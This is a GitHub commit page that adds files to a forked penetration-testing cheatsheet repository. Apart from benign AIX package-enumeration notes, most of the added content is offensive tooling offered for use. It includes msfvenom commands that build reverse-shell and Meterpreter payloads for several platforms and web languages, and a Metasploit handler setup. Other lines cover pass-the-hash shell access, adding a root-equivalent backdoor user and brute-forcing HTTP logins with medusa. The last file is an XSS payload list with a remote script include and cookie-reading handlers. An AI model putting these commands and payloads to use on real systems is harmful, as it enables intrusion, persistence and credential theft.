forked from dipsec/Cheatsheets-1
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Cheatsheet Updates
- Loading branch information
Showing
5 changed files
with
142 additions
and
3 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| loslevel: | ||
| -------- | ||
|
|
||
| Reports back on installed service pack, maintenance etc. levels of the AIX deployment. | ||
| Most of these appear to return absolutely nothing or loads of information. | ||
|
|
||
| oslevel (reports back the overall AIX version e.g. 6.1.0.0) | ||
| oslevel -q (reports back known maintenance levels on the host) | ||
| oslevel -rq (reports back known Recommended Maintenance Levels, think major releases) | ||
| oslevel -sq (reports back known Service Packs - has returned a load of service pack numbers for me, these are useful when looking at products in relation to the service pack) | ||
|
|
||
| e.g. | ||
| oslevel -s -g 6100-08-03-1339 | ||
|
|
||
| lslpp: | ||
| ------ | ||
|
|
||
| Displays information about installed filesets/software and updates. It's particularly useful when coupled with the information returned by itself | ||
|
|
||
| e.g. | ||
| lslpp -l (lists all packages, most recent level and state of them) | ||
| The package names can be passed back to it for more info, showing their patch management/application cycle. | ||
|
|
||
| e.g. | ||
| lslpp -h bos.rte - returns information regarding the updates applied to the Base Operating System package. bos.rte | ||
|
|
||
| rpm: | ||
| ---- | ||
|
|
||
| Standard redhat package manager, has turned up on a few machines. | ||
|
|
||
| rpm -qa | ||
| rpm -qa --last | ||
| These will report back packages installed by rpm and when. | ||
|
|
||
| Other than those, it's the same combination of looking through directories and permissions on files. I usually end up checking through with "find" and the "-perm" flag: | ||
| e.g. find /home/ -perm 777 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,71 @@ | ||
| [+] Creating Metasploit Payloads | ||
|
|
||
| List payloads | ||
| msfvenom -l | ||
|
|
||
| Binaries | ||
|
|
||
| Linux | ||
| msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf | ||
|
|
||
| Windows | ||
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe | ||
|
|
||
| Mac | ||
| msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho | ||
|
|
||
|
|
||
| Web Payloads | ||
|
|
||
| PHP | ||
| msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php | ||
| cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php | ||
|
|
||
| ASP | ||
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp | ||
|
|
||
| JSP | ||
| msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp | ||
|
|
||
| WAR | ||
| msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war | ||
|
|
||
|
|
||
| Scripting Payloads | ||
|
|
||
| Python | ||
| msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py | ||
|
|
||
| Bash | ||
| msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh | ||
|
|
||
| Perl | ||
| msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl | ||
|
|
||
|
|
||
| Shellcode | ||
|
|
||
| For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. | ||
|
|
||
| Linux Based Shellcode | ||
| msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> | ||
|
|
||
| Windows Based Shellcode | ||
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> | ||
|
|
||
| Mac Based Shellcode | ||
| msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language> | ||
|
|
||
|
|
||
| Handlers | ||
|
|
||
| Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. | ||
|
|
||
| use exploit/multi/handler | ||
| set PAYLOAD <Payload name> | ||
| set LHOST <LHOST value> | ||
| set LPORT <LPORT value> | ||
| set ExitOnSession false | ||
| exploit -j -z | ||
|
|
||
| Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -241,6 +241,10 @@ ssh [email protected] | |
|
|
||
| -------------------------------------------------------------------------- Post Exploitation | ||
|
|
||
| [+] Command prompt access on Windows Host | ||
|
|
||
| pth-winexe -U Administrator%<hash> //<host ip> cmd.exe | ||
|
|
||
| [+] Add Linux User | ||
| /usr/sbin/useradd –g 0 –u 0 –o user | ||
| echo user:password | /usr/sbin/chpasswd | ||
|
|
@@ -400,4 +404,10 @@ ldapsearch -h 192.168.0.60 -p 389 -x -D "CN=Administrator, CN=User, DC=<domain>, | |
|
|
||
| Useful Links: | ||
| http://www.lanmaster53.com/2013/05/public-facing-ldap-enumeration/ | ||
| http://blogs.splunk.com/2009/07/30/ldapsearch-is-your-friend/ | ||
| http://blogs.splunk.com/2009/07/30/ldapsearch-is-your-friend/ | ||
|
|
||
|
|
||
| -------------------------------------------------------------------------- Password Attacks | ||
|
|
||
| [+] Bruteforcing http password prompts | ||
| medusa -h <ip/host> -u <user> -P <password list> -M http -n <port> -m DIR:/<directory> -T 30 | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,9 @@ | ||
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; | ||
| alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- | ||
| ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | ||
|
|
||
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | ||
| <IMG SRC="javascript:alert('XSS');"> | ||
|
|
||
| <a onmouseover="alert(document.cookie)">xxs link</a> | ||
| <a onmouseover=alert(document.cookie)>xxs link</a> |